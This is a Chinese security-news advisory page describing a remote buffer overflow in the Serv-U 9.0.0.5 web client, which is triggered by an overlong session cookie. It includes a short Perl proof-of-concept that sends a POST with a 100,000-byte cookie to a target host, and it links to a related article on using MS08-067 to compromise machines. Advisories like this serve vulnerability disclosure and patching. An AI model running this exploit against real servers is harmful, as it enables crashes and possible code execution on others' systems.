作家
登录

Serv-U Web客户端HTTP请求远程溢出漏洞

作者: 来源: 2012-06-12 18:35:15 阅读 我要评论

Serv-U Web客户端HTTP请求远程溢出漏洞

影响版本:

RhinoSoft Serv-U 9.0.0.5

漏洞描述:

BUGTRAQ  ID: 36895

Serv-U FTP是一款FTP服务程序。

Serv-U产品捆绑有一个简单的基于浏览器的传输客户端,这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话Cookie,就可能触发这个溢出,导致在用户机器上执行任意指令。

---snip--- use IO::Socket; $|=1; $a = "A" x 100000; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],                               PeerPort => '80',                               Proto    => 'tcp');                             print $sock "POST / HTTP/1.1rn" ."Host: $ARGV[0]rn" ."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$arn" ."Content-Type: multipart/form-data; boundary=---------------------------25249352331758rn" ."Content-Length: 0rnrn"; while (<$sock>) {     print; } ---snip--- 

【编辑推荐】

  1. C'Nedra网络插件Read_TCP_String远程溢出漏洞
  2. 利用MS08067远程溢出漏洞抓肉鸡
  3. Alt-N MDaemon IMAP Server CREATE命令远程溢出漏洞

  推荐阅读

  瑞星杀毒软件不安全文件权限漏洞

瑞星杀毒软件不安全文件权限漏洞影响版本: Rising Antivirus 2009 (21.62.04) Rising Internet Security 2009 (21.62.04) Rising Personal Firewall 2009 (21.62.04)漏洞描述: BUGTRAQ ID: 36836 瑞星是中国的一家非>>>详细阅读


本文标题:Serv-U Web客户端HTTP请求远程溢出漏洞

地址:http://www.17bianji.com/anquan/buding/1481.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)